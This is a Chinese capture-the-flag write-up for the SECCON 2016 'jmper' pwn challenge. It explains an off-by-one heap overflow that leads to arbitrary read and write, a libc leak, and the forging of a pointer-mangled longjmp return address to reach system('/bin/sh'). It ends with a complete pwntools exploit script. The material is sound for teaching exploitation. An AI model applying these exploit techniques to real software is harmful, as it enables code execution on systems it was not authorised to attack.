前言

这个是 seccon-ctf-quals-2016 的一个题,利用方式还是挺特殊的记录一下。

题目链接

http://t.cn/RnfeHLv

正文

首先看看程序的安全措施

haclh@ubuntu:~/workplace/jmper$ checksec jmper
[*] '/home/haclh/workplace/jmper/jmper'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE

开了 Full RELRO, 所以不能修改 got 表了。

分配了两个大内存,一个作为一个全局表,用于存放程序中用的结构体指针, 一个作为 jmpbuf, 用于在 longjmp 时跳转回来。

接下来就是 f 函数,程序主要的逻辑在这里面。

** Add student**

最多的可以创建 0x1dstudent, 如果已经创建满了的话就 longjmp 返回到 main 函数结束程序。创建时会分配两个堆内存。

结构体类型大概为

分配第一个 student 时的 内存布局为

** Name student**

输入 id, 然后在 myclass 里面找到相应的地址,取出 name_ptr ,向里面写入内容,注意循环条件

for ( i = 0; i <= 0x20; ++i )

我们可以写入 0x21 个字节,我们分配的内存为 0x20, 可以有 一字节的 溢出,不过这里我们不能控制 分配的大小以及 释放堆块, 无法使用 overlap-heap 利用。继续往下看。

Write memo

类似的操作,依旧可以溢出 memo 的 一个字节, 在 memo 后面存放的是 name_ptr 所以我们可以修改 name_ptr 的最低字节.

有一个小知识,如果内存分配的顺序大小不变,各个内存块相对于堆基地址的偏移是固定的,所以修改 name_ptr 的最低字节,我们可以使得 name_ptr 指向和 它距离较近的堆块。

这里的话直接修改为下一个堆块的 name_ptr 的地址, 然后利用 name student 就可以修改下一个堆块的 name_ptr,再利用后面的  Show Name 功能就可以实现 任意地址读写。

以后通过

set_name(0, p64(addr))
getname(1)

就可以实现任意地址读

通过

set_name(0, p64(addr))
set_name(1, data)

就可以实现任意地址写

现在的问题是往哪写,写什么。

当新增的student的人数到限制后,会调用longjmp, 我们来看看 调用 longjmp 时做了什么

进入函数时 rdijmpbuf  的地址,可以看到,在 jmpbuf + 0x38 处存放了加密后的 rip, 进入 longjmp会先解密 出 rip 然后跳转。

mov     rdx, [rdi+38h]
ror rdx, 11h
xor rdx, fs:30h

jmpbuf 在堆中,如果我们可以 拿到 fs:30h 然后修改 jmpbuf + 0x38 ,我们就可以控制执行流了。

longjmp 跳转的地址其实就是 调用 setjmp 的下一条指令(0x400C31

又由于 xor 是可逆的,所以我们可以通过

mov     rdx, [rdi+38h]
ror rdx, 11h
xor rdx, 0x400C31

得到 fs:30h

至于重新的加密 rip 的过程,可以看 setjmp 的实现

所以总的利用思路

  • 利用 off-by-one 获取任意地址读写的能力
  • 利用 student 2name_ptr 泄露堆地址
  • 获取 jmpbuf + 0x38 的值,计算 fs:30h 的值
  • 重新计算值写入 jmpbuf + 0x38 , 同时往 jmpbuf 开头写入 ``/bin/sh\x00

参考

https://github.com/ctfs/write-ups-2016/tree/master/seccon-ctf-quals-2016/exploit/cheer-msg-100

最后的 exp:

#/usr/bin/env python
# -*- coding: utf-8 -*- from pwn import * # context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='info')
p = process("./jmper") def ror(reg, count):
src = bin(reg)[2:]
src = "0" * (64 - len(src)) + src
# print(src)
# print(src[-count:] + ":::" + src[:64 - count])
return int(src[-count:] + src[:64 - count],2) def rol(reg, count):
src = bin(reg)[2:]
src = "0" * (64 - len(src)) + src
# print(src)
# print(src[:count] + ":::" + src[count:])
# print(src[count:] + src[:count])
return int(src[count:] + src[:count],2) def add():
p.recvuntil("Bye :)")
p.sendline("1") def set_name(index, name):
p.recvuntil("Bye :)")
p.sendline("2")
p.recvuntil("ID:")
p.sendline(str(index))
p.recvuntil("Input name:")
p.sendline(name) def write_memo(index, data):
p.recvuntil("Bye :)")
p.sendline("3")
p.recvuntil("ID:")
p.sendline(str(index))
p.recvuntil("Input memo:")
p.sendline(data) def getname(index):
p.recvuntil("Bye :)")
p.sendline("4")
p.recvuntil("ID:")
p.sendline(str(index)) gdb.attach(p,'''
# bp 0x0400B03
# bp __sigsetjmp
c
''') pause() add() # get stu 0
set_name(0, "/bin/sh\x00")
write_memo(0, "b"*8) add() # get stu 1
set_name(1, "c"*8)
write_memo(1, "d"*8) write_memo(0, "b"*32 + "\x78") # 设置 student0 的 name_ptr 指向 student1 的 name_ptr 的位置
log.info("此时 0's name_ptr--> 1's name_ptr的地址")
pause() getname(0)
heap = u64(p.recv(3) + "\x00" * 5) - 656
log.info("heap的基地址: " + hex(heap))
pause() set_name(0, p64(0x0601FA8+1))
log.info("1's name_ptr ---> printf@got+1")
pause() getname(1)
printf_addr = u64("\x00" + p.recv(5) + "\x00" * 2)
libc = printf_addr - 350208
system = libc + 283536
longjmp = libc + 0x352F0 log.info("libc: " + hex(libc))
log.info("system: " + hex(system))
log.info("longjmp: " + hex(longjmp))
pause() jmpbuf = heap + 0x110
saved_rip_addr = jmpbuf + 0x38 # 获取 saved_rip_addr 处的数据
set_name(0, p64(saved_rip_addr))
getname(1)
saved_rip = u64(p.recv(8))
xor_key = ror(saved_rip, 0x11) ^ 0x400C31 new_saved_rip = rol(system ^ xor_key, 0x11) log.info("saved_rip: " + hex(saved_rip))
log.info("xor_key: " + hex(xor_key))
log.info("new saved_rip: " + hex(new_saved_rip) )
pause() set_name(1,p64(new_saved_rip)) set_name(0, p64(jmpbuf))
set_name(1,"/bin/sh\x00") log.info("set jmpbuf: /bin/sh\x00.....")
pause() for x in xrange(0x1e - 2):
add() log.info("call longjmp")
pause()
add()
p.interactive()

Pwn With longjmp的更多相关文章

  1. Pwn~

    Pwn Collections Date from 2016-07-11 Difficult rank: $ -> $$... easy -> hard CISCN 2016 pwn-1 ...

  2. C 语言中 setjmp 和 longjmp

    在 C 语言中,我们不能使用 goto 语句来跳转到另一个函数中的某个 label 处:但提供了两个函数——setjmp 和 longjmp来完成这种类型的分支跳转.后面我们会看到这两个函数在处理异常 ...

  3. 非本地跳转之setjmp与longjmp

    非本地跳转(unlocal jump)是与本地跳转相对应的一个概念. 本地跳转主要指的是类似于goto语句的一系列应用,当设置了标志之后,可以跳到所在函数内部的标号上.然而,本地跳转不能将控制权转移到 ...

  4. longjmp setjmp and volatile

    /******************************************************************************* * 版权所有: * 模 块 名: * ...

  5. setjmp()、longjmp() Linux Exception Handling/Error Handling、no-local goto

    目录 . 应用场景 . Use Case Code Analysis . 和setjmp.longjmp有关的glibc and eglibc 2.5, 2.7, 2.13 - Buffer Over ...

  6. 使用signal、setjmp、longjmp进行Linux/Android C异常处理

    #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <setjmp.h&g ...

  7. C中的setjmp与longjmp

    setjmp与longjmp是属于C语言中的,当然,C++也会有这两个函数了.他们的原型如下: int setjmp( jmp_buf env ); 作用:第一次调佣时,将寄存器的当前状态信息全部存入 ...

  8. setjmp 与 longjmp

    setjmp和longjmp是C语言独有的,只有将它们结合起来使用,才能达到程序控制流有效转移的目的,按照程序员的预先设计的意图,去实现对程序中可能出现的异常进行集中处理. 先来看一下这两个函数的定义 ...

  9. 在信号处理函数中调用longjmp

    错误情况及原因分析 前两天看APUE的时候,有个程序要自己制作一个sleep程序,结果在这个程序中就出现了在信号处理函数中调用longjmp函数的情况,结果就出现了错误,具体错误是啥呢,请参见下面这段 ...

随机推荐

  1. Swift 学习指引

    以下指引是基于最新的 Swift 4.0 为基础为而言. 如你在参考3.0以下版本, 那你就不要说你会 Swift, 3.0 之前是 Objective-C 的搬迁(80%),是不成熟的语言, 看着很 ...

  2. To be learned

    1.web性能测试工具:LoadRunner:2.web自动化测试工具:selenium QTP:3.安全性测试工具:AppScan4.缺陷管理工具:TestLink+Mantisbt5..抓包工具: ...

  3. python聚类算法实战详细笔记 (python3.6+(win10、Linux))

    python聚类算法实战详细笔记 (python3.6+(win10.Linux)) 一.基本概念:     1.计算TF-DIF TF-IDF是一种统计方法,用以评估一字词对于一个文件集或一个语料库 ...

  4. hanlp的基本使用--python(自然语言处理)

    hanlp拥有:中文分词.命名实体识别.摘要关键字.依存句法分析.简繁拼音转换.智能推荐. 这里主要介绍一下hanlp的中文分词.命名实体识别.依存句法分析,这里就不介绍具体的hanlp的安装了,百度 ...

  5. linux把程序添加到全局环境变量

    比如把, nginx服务放到全局变量 ln -s /usr/local/nginx/sbin/nginx /usr/local/bin/ /usr/local/bin/就是环境变量目录

  6. 【数组】Sort Colors

    题目: Given an array with n objects colored red, white or blue, sort them so that objects of the same ...

  7. IE6基本bug

    一.IE6双倍边距bug当页面上的元素使用float浮动时,不管是向左还是向右浮动:只要该元素带有margin像素都会使该值乘以2,例如“margin-left:10px” 在IE6中,该值就会被解析 ...

  8. Chapter 3 Phenomenon——18

    My intuition flickered; the doctor was in on it. 我的直觉告诉我:这个医生也参与了. 我灵光一闪:这医生熟悉内情. "I'm afraid t ...

  9. 全连接层(FC)与全局平均池化层(GAP)

    在卷积神经网络的最后,往往会出现一两层全连接层,全连接一般会把卷积输出的二维特征图转化成一维的一个向量,全连接层的每一个节点都与上一层每个节点连接,是把前一层的输出特征都综合起来,所以该层的权值参数是 ...

  10. leetcode 98,判断二叉树为BST

    方法一,记录子树的上界和下界,root的左子树一定小于root的值,root的右子树一定大于root的值,然后递归左子树和右子树 public class Solution { public bool ...